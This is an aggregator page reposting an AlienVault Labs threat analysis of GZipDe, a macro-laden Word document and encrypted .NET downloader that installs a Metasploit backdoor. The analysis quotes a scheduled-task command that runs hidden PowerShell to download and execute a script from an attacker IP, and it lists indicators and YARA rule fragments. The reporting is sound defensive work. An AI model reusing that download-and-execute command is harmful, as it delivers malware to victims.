One Article Review
| Source |  AlienVault Lab Blog |
|---|---|
| Identifiant | 740341 |
| Date de publication | 2018-06-20 16:44:00 (vue: 2018-07-11 17:03:30) |
| Titre | GZipDe: An Encrypted Downloader Serving Metasploit |
| Texte |
At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy:
This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
Malicious Document
The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc). When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console:
'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F
Leveraging an HTTP request, it resolves to the following URL:
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
We are missing the next step of the infection chain as the server is now offline.
Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
GZipDe - The Encrypted Downloader
The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine:
\Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb
We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption payload to that version. It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection.
The key is described as an array of bytes, with the values:
After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes.
The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a |
| Notes | ★★★★★ |
| Envoyé | Oui |
| Condensat | $pdb $st* $st1 $st2 $st3 $st4 $st5 import rule 0102 0x5a4d 2008 2e0eb747 441a 44e9 7c1ca7d24219 82ba 97ab27b49ec5 a8b1 alienvault all and any ascii author be46 c1181bc0 com com/damonmohammadbagher/nativepayload com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef condition: createthread description documents dotnet downloader encrypted encryptinitalize encryptoutput execute guids gzipde gzipde: https://github https://otx jblasco@alienvault jhon kernel32 malware meta: metasploit meterpreterencryptedpayloaddotnetgzipde modulerefs nocase number or page pdb readwrite reference1 reference2= reverse serving strings: studio tcp tcp/blob/master/nativepayload them type typelib uint16 virtualalloc visual wide |
| Tags | |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.